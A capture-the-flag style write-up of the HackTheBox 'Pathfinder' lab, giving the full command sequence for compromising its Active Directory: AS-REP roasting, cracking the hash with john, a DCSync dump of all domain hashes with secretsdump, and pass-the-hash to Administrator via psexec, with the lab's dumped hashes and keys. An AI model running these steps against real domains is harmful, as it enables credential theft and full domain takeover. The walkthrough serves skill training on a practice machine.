HackTheBox Pathfinder Writeup

HackTheBox is a popular service that publishes vulnerable Windows and Linux machines in order to prepare hackers for certifications like the ones from Offensive Security or let them improve their skills for real-life scenarios. The difficulty of these machines varies from beginner up to professional; This HTB Pathfinder walkthrough will explain my way to nt authority/system permissions step by step so that someone with little knowledge about Active Directory can follow along.

HackTheBox Pathfinder focuses on Active Directory security and touches topics like enumerating an AD, misconfigured Kerberos authentication, and abusing it for privilege escalation.

Information Gathering

First, let's start scanning HTB Pathfinder using nmap:

sudo nmap -p 1-5000 -sV -O -v 10.10.10.30

 0PORT     STATE SERVICE       VERSION
 153/tcp   open  domain        Simple DNS Plus
 288/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-04-27 02:58:39Z)
 3135/tcp  open  msrpc         Microsoft Windows RPC
 4139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
 5389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
 6445/tcp  open  microsoft-ds?
 7464/tcp  open  kpasswd5?
 8593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
 9636/tcp  open  tcpwrapped
103268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
113269/tcp open  tcpwrapped

On HackTheBox Pathfinder there are quite a few open ports compared to the other machines so far. Once again, it's a Microsoft Windows system that runs an Active Directory as well as a kerberos server.

Enumerating the Active Directory

For this HackTheBox Pathfinder walkthrough, I am going to use bloodhound which is a tool based on impacket and can be used for enumerating ADs.

If you have not installed bloodhound you can so with pip: pip install bloodhound and then execute it with bloodhound-python.

From the nmap scan we already know that the domain name is MEGACORP.LOCAL now let's fire up bloodhound and try the credentials we found during post-exploiting Shield.

bloodhound-python -u sandra -p Password1234! -d MEGACORP.LOCAL -c all -ns 10.10.10.30

From the output of bloodhound we know that HTB Pathfinder has five users, 51 groups and the LDAP server is reachable on PATHFINDER.MEGACORP.LOCAL.

The next step in this HackTheBox Pathfinder walkthrough is importing the data we collected into bloodhound.

sudo neo4j console bloodhound --no-sandbox

Then choose the upload data function and import the json files we got from bloodhound-python:

• computers.json
• domains.json
• groups.json
• users.json

Click on Analysis and select Find AS-REP Roastable Users (DontReqPreAuth) which will search for users that do not have Kerberos pre-authentication enabled.

If this feature is explicitly disabled (like for [email protected]) you are able to receive encrypted information from the AD and offline-guess the user's password.

In order to find out more about the user click on First Degree Object Control which gives us 39 entries. The most relevant one is GetChangesAll which means that SVC_BES is allowed to request (sensitive) information from the Domain Controller. This includes hashed passwords from other AD users.

Accessing the AD & obtaining the user flag

To get such information from HTB Pathfinder we can use GetNPUsers.py from the impacket toolset:

python GetNPUsers.py MEGACORP.LOCAL/SVC_BES -request -no-pass -dc 10.10.10.30

that gives us

0[email protected]:4f0a985626626bbac7758792cb86b8b1$b723a75b8008481e27afd844d3907ea6cd116b60d0bc966b4934a5a8752b0b56924d08105a4634c6b4e54e69cee5dc962d84e480de3d6914d6ebb760568bcb62c71ca3774fdc76a49a359303f5e8813e5d3fbac7e5d16d785678c5beb6f3a566abf86e412d56c91fe82ed8763afe3c23056281d7f96c7426d09c16d93ee990b7a4ba71a51726d88ba9b60b3d35a33b5c1cf94c0c50b2c32799dc0247b7ca0226dcafe5d9d568dde32411b30f4e58dffe669a5eabfad3d1beaea046919af7ce991aa8db924934b4719d16f2a3c304f67224d8c8e32734c0f30e94cc7cdd4054d85851037a6aef05434e87c5f0bceaba94

Now take the output save it in a file and let john crack it:

john ad_hash_file --wordlist=/home/user/Desktop/Lists/rockyou.txt and to display the hash john ad_hash_file --show

[email protected]:Sheffield19

In order to connect to the Active Directory we need a tool like winrm, a linux version of this can be installed using ruby: sudo gem install evil-winrm

After installing the software you can log into the AD with:

evil-winrm -i 10.10.10.30 -u SVC_BES -p Sheffield19

0┌─[user@parrot-virtual]─[~/Desktop]
1└──╼ $sudo evil-winrm -i 10.10.10.30 -u SVC_BES -p Sheffield19 
2
3Evil-WinRM shell v2.4
4
5Info: Establishing connection to remote endpoint
6
7*Evil-WinRM* PS C:\Users\svc_bes\Documents> 

After logging in you can obtain the user flag for HTB Pathfinder by navigating into C:\Users\svc_bes\Desktop and displaying the content of user.txt with type.

Escalating our privileges

By abusing the GetChangesAll privilege we can dump the NTLM password hashes of all the other users. Once again, impacket has a tool for that called secretsdump.

python secretsdump.py MEGACORP.LOCAL/SVC_BES:[email protected]

 0Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
 1
 2[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
 3[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
 4[*] Using the DRSUAPI method to get NTDS.DIT secrets
 5Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
 6Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 7krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
 8svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
 9sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
10PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:84e6dd5989ce0f978f132939ffa346ec:::
11[*] Kerberos keys grabbed
12Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
13Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
14Administrator:des-cbc-md5:f1c89e75a42cd0fb
15krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
16krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
17krbtgt:des-cbc-md5:d0f8d0c86ee9d997
18svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
19svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
20svc_bes:des-cbc-md5:1cc16e37ef8940b5
21sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
22sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
23sandra:des-cbc-md5:23988f7a9d679d37
24PATHFINDER$:aes256-cts-hmac-sha1-96:fae398751d86464b62b5770c68ce118c427a8315a646676852defe5eb0079c94
25PATHFINDER$:aes128-cts-hmac-sha1-96:f2d2f999e07cabca7de338fd9484d28d
26PATHFINDER$:des-cbc-md5:cb730e734a804afb
27[*] Cleaning up... 

Luckily, it is not necessary to crack these hashes simply use psexec to log in as Administrator:

python psexec.py MEGACORP.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18

I hope you enjoyed this HTB Pathfinder walkthrough, if you got any questions feel free to reach out to me!

Tags

hackthebox, htb, pathfinder, Active Directory, Privilege Escalation, Windows